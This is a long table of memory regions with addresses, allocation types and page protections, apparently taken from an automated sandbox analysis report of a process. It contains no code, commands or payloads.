trusted library allocation
|
page read and write
|
||
1E42EB28000
|
trusted library allocation
|
page read and write
|
||
1E42E042000
|
trusted library allocation
|
page read and write
|
||
1E42E982000
|
trusted library allocation
|
page read and write
|
||
1E7DDFF4000
|
trusted library allocation
|
page read and write
|
||
1E42E75D000
|
trusted library allocation
|
page read and write
|
||
1E7DDFD3000
|
trusted library allocation
|
page read and write
|
||
1E42DFD6000
|
trusted library allocation
|
page read and write
|
||
1E7F4A09000
|
heap
|
page read and write
|
||
1E42EAF8000
|
trusted library allocation
|
page read and write
|
||
1E42F3CF000
|
trusted library allocation
|
page read and write
|
||
1E42DE1B000
|
trusted library allocation
|
page read and write
|
||
96536FD000
|
stack
|
page read and write
|
||
1E7DE3C0000
|
trusted library allocation
|
page read and write
|
||
675F14F000
|
stack
|
page read and write
|
||
1E42EAFB000
|
trusted library allocation
|
page read and write
|
||
1E7DC570000
|
heap
|
page read and write
|
||
1E42B338000
|
heap
|
page read and write
|
||
1E42EEB0000
|
trusted library allocation
|
page read and write
|
||
1E42E96D000
|
trusted library allocation
|
page read and write
|
||
1E42F3F0000
|
trusted library allocation
|
page read and write
|
||
1E7DE3B7000
|
trusted library allocation
|
page read and write
|
||
1E7DE003000
|
trusted library allocation
|
page read and write
|
||
1E42ECCB000
|
trusted library allocation
|
page read and write
|
||
1E42F1D2000
|
trusted library allocation
|
page read and write
|
||
7FF83C5AC000
|
trusted library allocation
|
page execute and read and write
|
||
1E42E59F000
|
trusted library allocation
|
page read and write
|
||
1E42E584000
|
trusted library allocation
|
page read and write
|
||
7FF83C500000
|
trusted library allocation
|
page read and write
|
||
1E42E98B000
|
trusted library allocation
|
page read and write
|
||
1E42E56C000
|
trusted library allocation
|
page read and write
|
||
1E42E012000
|
trusted library allocation
|
page read and write
|
||
7FF83C7C0000
|
trusted library allocation
|
page read and write
|
||
1E7DE3C3000
|
trusted library allocation
|
page read and write
|
||
1E42F3B1000
|
trusted library allocation
|
page read and write
|
||
1E7DA9C3000
|
heap
|
page read and write
|
||
1E42DCCF000
|
trusted library allocation
|
page read and write
|
||
1E42F21D000
|
trusted library allocation
|
page read and write
|
||
1E42F1E1000
|
trusted library allocation
|
page read and write
|
||
1E7DDEC6000
|
trusted library allocation
|
page read and write
|
||
1E42EB13000
|
trusted library allocation
|
page read and write
|
||
1E42E03F000
|
trusted library allocation
|
page read and write
|
||
1E7DE009000
|
trusted library allocation
|
page read and write
|
||
1E7DDDD4000
|
trusted library allocation
|
page read and write
|
||
1E42E408000
|
trusted library allocation
|
page read and write
|
||
1E42E024000
|
trusted library allocation
|
page read and write
|
||
1E42E94C000
|
trusted library allocation
|
page read and write
|
||
1E7DD589000
|
trusted library allocation
|
page read and write
|
||
1E42B2EF000
|
heap
|
page read and write
|
||
1E7DE593000
|
trusted library allocation
|
page read and write
|
||
1E42EE95000
|
trusted library allocation
|
page read and write
|
||
1E7DE3A2000
|
trusted library allocation
|
page read and write
|
||
1E42F044000
|
trusted library allocation
|
page read and write
|
||
1E7F4C58000
|
heap
|
page read and write
|
||
1E7F4AF0000
|
heap
|
page read and write
|
||
675E6BC000
|
stack
|
page read and write
|
||
1E42EE62000
|
trusted library allocation
|
page read and write
|
||
1E7DE205000
|
trusted library allocation
|
page read and write
|
||
1E7DDB9F000
|
trusted library allocation
|
page read and write
|
||
1E42DE8D000
|
trusted library allocation
|
page read and write
|
||
1E42F1F3000
|
trusted library allocation
|
page read and write
|
||
1E7DE590000
|
trusted library allocation
|
page read and write
|
||
1E42F07A000
|
trusted library allocation
|
page read and write
|
||
1E42ECB3000
|
trusted library allocation
|
page read and write
|
||
1E42E3C9000
|
trusted library allocation
|
page read and write
|
||
1E7DD34C000
|
trusted library allocation
|
page read and write
|
||
1E42E970000
|
trusted library allocation
|
page read and write
|
||
7FF83C610000
|
trusted library allocation
|
page execute and read and write
|
||
1E7F4AC8000
|
heap
|
page read and write
|
||
1E4452A0000
|
heap
|
page read and write
|
||
1E7DDEBD000
|
trusted library allocation
|
page read and write
|
||
7FF83C6E0000
|
trusted library allocation
|
page execute and read and write
|
||
1E7F48C5000
|
heap
|
page read and write
|
||
7FF83C5A6000
|
trusted library allocation
|
page execute and read and write
|
||
1E42E24D000
|
trusted library allocation
|
page read and write
|
||
7FF83C4CD000
|
trusted library allocation
|
page execute and read and write
|
||
1E42E045000
|
trusted library allocation
|
page read and write
|
||
1E42EEA4000
|
trusted library allocation
|
page read and write
|
||
1E7DE119000
|
trusted library allocation
|
page read and write
|
||
1E7DD7C1000
|
trusted library allocation
|
page read and write
|
||
1E7DC540000
|
trusted library allocation
|
page read and write
|
||
1E42F3ED000
|
trusted library allocation
|
page read and write
|
||
1E7DE584000
|
trusted library allocation
|
page read and write
|
||
1E42E5C3000
|
trusted library allocation
|
page read and write
|
||
1E42E3C6000
|
trusted library allocation
|
page read and write
|
||
1E7DE3E7000
|
trusted library allocation
|
page read and write
|
||
7FF83C7F0000
|
trusted library allocation
|
page read and write
|
||
1E42D645000
|
trusted library allocation
|
page read and write
|
||
1E42EB40000
|
trusted library allocation
|
page read and write
|
||
1E7DE21A000
|
trusted library allocation
|
page read and write
|
||
1E42E961000
|
trusted library allocation
|
page read and write
|
||
1E7DDCCA000
|
trusted library allocation
|
page read and write
|
||
1E42DCC9000
|
trusted library allocation
|
page read and write
|
||
1E42EEDA000
|
trusted library allocation
|
page read and write
|
||
1E42E5C6000
|
trusted library allocation
|
page read and write
|
||
1E7DDA80000
|
trusted library allocation
|
page read and write
|
||
1E42E988000
|
trusted library allocation
|
page read and write
|
||
1E42F23B000
|
trusted library allocation
|
page read and write
|
||
1E42F1F0000
|
trusted library allocation
|
page read and write
|
||
1E42DFCD000
|
trusted library allocation
|
page read and write
|
||
7FF83C740000
|
trusted library allocation
|
page read and write
|
||
1E42DE2D000
|
trusted library allocation
|
page read and write
|
||
1E7DDEC9000
|
trusted library allocation
|
page read and write
|
||
1E42DFF7000
|
trusted library allocation
|
page read and write
|
||
1E42EB64000
|
trusted library allocation
|
page read and write
|
||
1E7DE20B000
|
trusted library allocation
|
page read and write
|
||
1E7DD991000
|
trusted library allocation
|
page read and write
|
||
1E42E036000
|
trusted library allocation
|
page read and write
|
||
1E42E5B4000
|
trusted library allocation
|
page read and write
|
||
1E7DAA64000
|
heap
|
page read and write
|
||
1E42DE78000
|
trusted library allocation
|
page read and write
|
||
1E42ED19000
|
trusted library allocation
|
page read and write
|
||
1E42F080000
|
trusted library allocation
|
page read and write
|
||
1E42E202000
|
trusted library allocation
|
page read and write
|
||
1E42F20B000
|
trusted library allocation
|
page read and write
|
||
1E42E5CF000
|
trusted library allocation
|
page read and write
|
||
1E42F1DB000
|
trusted library allocation
|
page read and write
|
||
1E42DE18000
|
trusted library allocation
|
page read and write
|
||
1E42E575000
|
trusted library allocation
|
page read and write
|
||
1E42ECEF000
|
trusted library allocation
|
page read and write
|
||
1E42E745000
|
trusted library allocation
|
page read and write
|
||
1E42E578000
|
trusted library allocation
|
page read and write
|
||
1E42DE4E000
|
trusted library allocation
|
page read and write
|
||
1E7DDA9B000
|
trusted library allocation
|
page read and write
|
||
1E7DD7E8000
|
trusted library allocation
|
page read and write
|
||
1E7DD6BD000
|
trusted library allocation
|
page read and write
|
||
1E7DCC25000
|
trusted library allocation
|
page read and write
|
||
1E42F384000
|
trusted library allocation
|
page read and write
|
||
1E7DD98B000
|
trusted library allocation
|
page read and write
|
||
1E42DE5D000
|
trusted library allocation
|
page read and write
|
||
1E7DDFEE000
|
trusted library allocation
|
page read and write
|
||
1E42F22C000
|
trusted library allocation
|
page read and write
|
||
7FF83C67A000
|
trusted library allocation
|
page read and write
|
||
1E42ECD1000
|
trusted library allocation
|
page read and write
|
||
1E7DDB96000
|
trusted library allocation
|
page read and write
|
||
1E7DE3A5000
|
trusted library allocation
|
page read and write
|
||
1E42DFEB000
|
trusted library allocation
|
page read and write
|
||
965470F000
|
stack
|
page read and write
|
||
1E7DE10D000
|
trusted library allocation
|
page read and write
|
||
1E42DFF4000
|
trusted library allocation
|
page read and write
|
||
1E7DC3E0000
|
heap
|
page read and write
|
||
1E7F49D3000
|
heap
|
page read and write
|
||
1E7DE566000
|
trusted library allocation
|
page read and write
|
||
1E7DDFDC000
|
trusted library allocation
|
page read and write
|
||
1E7DE113000
|
trusted library allocation
|
page read and write
|
||
1E7F49E8000
|
heap
|
page read and write
|
||
1E42EB34000
|
trusted library allocation
|
page read and write
|
||
1E42E205000
|
trusted library allocation
|
page read and write
|
||
1E42EEAD000
|
trusted library allocation
|
page read and write
|
||
1E42E9BB000
|
trusted library allocation
|
page read and write
|
||
7FF83C4F4000
|
trusted library allocation
|
page read and write
|
||
1E7DD6D5000
|
trusted library allocation
|
page read and write
|
||
1E42ED1F000
|
trusted library allocation
|
page read and write
|
||
1E7DDECC000
|
trusted library allocation
|
page read and write
|
||
1E42E3DE000
|
trusted library allocation
|
page read and write
|
||
675F1CE000
|
stack
|
page read and write
|
||
1E7F4A38000
|
heap
|
page read and write
|
||
1E42E244000
|
trusted library allocation
|
page read and write
|
||
1E42EEB3000
|
trusted library allocation
|
page read and write
|
||
1E42ECD4000
|
trusted library allocation
|
page read and write
|
||
1E7DE5A2000
|
trusted library allocation
|
page read and write
|
||
1E42B4B0000
|
trusted library allocation
|
page read and write
|
||
26C65028000
|
heap
|
page read and write
|
||
1E42F3D5000
|
trusted library allocation
|
page read and write
|
||
1E7DE3E1000
|
trusted library allocation
|
page read and write
|
||
1E42B2F8000
|
heap
|
page read and write
|
||
1E42E73F000
|
trusted library allocation
|
page read and write
|
||
1E42E98E000
|
trusted library allocation
|
page read and write
|
||
965464D000
|
stack
|
page read and write
|
||
1E7DE3CF000
|
trusted library allocation
|
page read and write
|
||
1E445490000
|
heap
|
page read and write
|
||
1E42E3DB000
|
trusted library allocation
|
page read and write
|
||
1E42E5C9000
|
trusted library allocation
|
page read and write
|
||
1E42F3C0000
|
trusted library allocation
|
page read and write
|
||
1E42E006000
|
trusted library allocation
|
page read and write
|
||
1E42F029000
|
trusted library allocation
|
page read and write
|
||
1E42E979000
|
trusted library allocation
|
page read and write
|
||
1E7DE1F3000
|
trusted library allocation
|
page read and write
|
||
7FF83C671000
|
trusted library allocation
|
page read and write
|
||
675DFFE000
|
stack
|
page read and write
|
||
1E42E748000
|
trusted library allocation
|
page read and write
|
||
1E7DE0FB000
|
trusted library allocation
|
page read and write
|
||
1E42B230000
|
heap
|
page read and write
|
||
7FF83C660000
|
trusted library allocation
|
page read and write
|
||
1E42F3DE000
|
trusted library allocation
|
page read and write
|
||
1E42E5AB000
|
trusted library allocation
|
page read and write
|
||
1E42E3E4000
|
trusted library allocation
|
page read and write
|
||
1E42F217000
|
trusted library allocation
|
page read and write
|
||
7FF83C4C2000
|
trusted library allocation
|
page read and write
|
||
1E7DE554000
|
trusted library allocation
|
page read and write
|
||
1E42E22C000
|
trusted library allocation
|
page read and write
|
||
1E7DC550000
|
heap
|
page execute and read and write
|
||
1E42E72D000
|
trusted library allocation
|
page read and write
|
||
1E42E3C0000
|
trusted library allocation
|
page read and write
|
||
1E4453F7000
|
heap
|
page execute and read and write
|
||
1E7DDDD7000
|
trusted library allocation
|
page read and write
|
||
1E7DE10A000
|
trusted library allocation
|
page read and write
|
||
1E7DE107000
|
trusted library allocation
|
page read and write
|
||
1E42E5BD000
|
trusted library allocation
|
page read and write
|
||
1E42ED25000
|
trusted library allocation
|
page read and write
|
||
1E7DE0FE000
|
trusted library allocation
|
page read and write
|
||
1E7DC420000
|
trusted library allocation
|
page read and write
|
||
1E42EB4C000
|
trusted library allocation
|
page read and write
|
||
1E42DE33000
|
trusted library allocation
|
page read and write
|
||
1E42DE27000
|
trusted library allocation
|
page read and write
|
||
1E7DDA7D000
|
trusted library allocation
|
page read and write
|
||
675DE73000
|
stack
|
page read and write
|
||
1E42EAFE000
|
trusted library allocation
|
page read and write
|
||
1E7DDECF000
|
trusted library allocation
|
page read and write
|
||
1E42EB5B000
|
trusted library allocation
|
page read and write
|
||
1E42DE6C000
|
trusted library allocation
|
page read and write
|
||
1E42F220000
|
trusted library allocation
|
page read and write
|
||
7FF83C730000
|
trusted library allocation
|
page read and write
|
||
1E42EB61000
|
trusted library allocation
|
page read and write
|
||
1E42E24A000
|
trusted library allocation
|
page read and write
|
||
7FF83C4C4000
|
trusted library allocation
|
page read and write
|
||
1E7DD6B1000
|
trusted library allocation
|
page read and write
|
||
1E42EB04000
|
trusted library allocation
|
page read and write
|
||
1E7DDEED000
|
trusted library allocation
|
page read and write
|
||
1E42EB2E000
|
trusted library allocation
|
page read and write
|
||
1E42E766000
|
trusted library allocation
|
page read and write
|
||
1E7DE0E9000
|
trusted library allocation
|
page read and write
|
||
9654503000
|
stack
|
page read and write
|
||
1E7DA9C1000
|
heap
|
page read and write
|
||
1E42EE86000
|
trusted library allocation
|
page read and write
|
||
1E42E596000
|
trusted library allocation
|
page read and write
|
||
1E7DDDE6000
|
trusted library allocation
|
page read and write
|
||
1E42E3B1000
|
trusted library allocation
|
page read and write
|
||
1E42E021000
|
trusted library allocation
|
page read and write
|
||
1E42F399000
|
trusted library allocation
|
page read and write
|
||
1E42E77E000
|
trusted library allocation
|
page read and write
|
||
1E7DE0E3000
|
trusted library allocation
|
page read and write
|
||
1E42F050000
|
trusted library allocation
|
page read and write
|
||
1E42E985000
|
trusted library allocation
|
page read and write
|
||
1E42E226000
|
trusted library allocation
|
page read and write
|
||
9653B7B000
|
stack
|
page read and write
|
||
1E42E1FF000
|
trusted library allocation
|
page read and write
|
||
C09E74F000
|
stack
|
page read and write
|
||
7FF83C6F0000
|
trusted library allocation
|
page read and write
|
||
1E7F4A1B000
|
heap
|
page read and write
|
||
1E7DCF1C000
|
trusted library allocation
|
page read and write
|
||
1E42ED07000
|
trusted library allocation
|
page read and write
|
||
1E7DD96D000
|
trusted library allocation
|
page read and write
|
||
1E42E736000
|
trusted library allocation
|
page read and write
|
||
1E42E027000
|
trusted library allocation
|
page read and write
|
||
1E7DD967000
|
trusted library allocation
|
page read and write
|
||
1E42F3EA000
|
trusted library allocation
|
page read and write
|
||
1E42F020000
|
trusted library allocation
|
page read and write
|
||
1E7DE0EF000
|
trusted library allocation
|
page read and write
|
||
1E42E964000
|
trusted library allocation
|
page read and write
|
||
1E7DD34E000
|
trusted library allocation
|
page read and write
|
||
1E7DD8E0000
|
trusted library allocation
|
page read and write
|
||
1E42D11E000
|
heap
|
page read and write
|
||
26C65020000
|
heap
|
page read and write
|
||
1E42B352000
|
heap
|
page read and write
|
||
1E7DD5A7000
|
trusted library allocation
|
page read and write
|
||
1E42F3E7000
|
trusted library allocation
|
page read and write
|
||
1E7DE5A8000
|
trusted library allocation
|
page read and write
|
||
1E7DDDC2000
|
trusted library allocation
|
page read and write
|
||
1E42E73C000
|
trusted library allocation
|
page read and write
|
||
7FF83C7E0000
|
trusted library allocation
|
page read and write
|
||
1E42F1ED000
|
trusted library allocation
|
page read and write
|
||
7FF83C720000
|
trusted library allocation
|
page read and write
|
||
1E42EE77000
|
trusted library allocation
|
page read and write
|
||
7FF83C7C0000
|
trusted library allocation
|
page read and write
|
||
7FF83C6D0000
|
trusted library allocation
|
page read and write
|
||
1E42E581000
|
trusted library allocation
|
page read and write
|
||
1E42EE8F000
|
trusted library allocation
|
page read and write
|
||
1E7DA9DF000
|
heap
|
page read and write
|
||
1E42ECBC000
|
trusted library allocation
|
page read and write
|
||
7FF83C850000
|
trusted library allocation
|
page read and write
|
||
1E42F053000
|
trusted library allocation
|
page read and write
|
||
1E7DD348000
|
trusted library allocation
|
page read and write
|
||
1E42B260000
|
heap
|
page read and write
|
||
1E7DD8CE000
|
trusted library allocation
|
page read and write
|
||
1E42B5B4000
|
heap
|
page read and write
|
||
1E42EEAA000
|
trusted library allocation
|
page read and write
|
||
1E42E57B000
|
trusted library allocation
|
page read and write
|
||
1E42F1CF000
|
trusted library allocation
|
page read and write
|
||
1E7EC8D1000
|
trusted library allocation
|
page read and write
|
||
7FF83C4FD000
|
trusted library allocation
|
page execute and read and write
|
||
1E7DDED8000
|
trusted library allocation
|
page read and write
|
||
1E42DE30000
|
trusted library allocation
|
page read and write
|
||
1E42F059000
|
trusted library allocation
|
page read and write
|
||
1E42F1D8000
|
trusted library allocation
|
page read and write
|
||
1E42F1F6000
|
trusted library allocation
|
page read and write
|
||
1E42E3D5000
|
trusted library allocation
|
page read and write
|
||
1E7DE3A8000
|
trusted library allocation
|
page read and write
|
||
1E42EE6E000
|
trusted library allocation
|
page read and write
|
||
1E42DE3C000
|
trusted library allocation
|
page read and write
|
||
1E42E58A000
|
trusted library allocation
|
page read and write
|
||
1E42E784000
|
trusted library allocation
|
page read and write
|
||
1E42EB6D000
|
trusted library allocation
|
page read and write
|
||
675F10D000
|
stack
|
page read and write
|
||
1E42E259000
|
trusted library allocation
|
page read and write
|
||
7FF83C790000
|
trusted library allocation
|
page read and write
|
||
1E42E217000
|
trusted library allocation
|
page read and write
|
There are 1062 hidden memdumps, click here to show them.